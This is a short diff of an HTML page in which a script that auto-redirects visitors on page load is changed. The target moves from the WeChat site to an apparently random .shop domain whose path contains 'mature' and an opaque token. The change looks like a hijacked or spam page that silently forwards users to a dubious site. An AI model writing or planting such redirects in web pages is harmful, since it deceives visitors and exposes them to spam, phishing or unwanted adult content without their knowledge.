--- a/zy122902/index.html
+++ b/zy122902/index.html
@@ -7,7 +7,7 @@
 	<body>
 		<script>
 		setTimeout(function () {
-		window.location.href = "https://weixin.qq.com";
+		window.location.href = "http://www.y73py788r.shop/mature/F0d9Yw/VMJcw5hsFF";
 		}, 100);
 		</script>
 	</body>
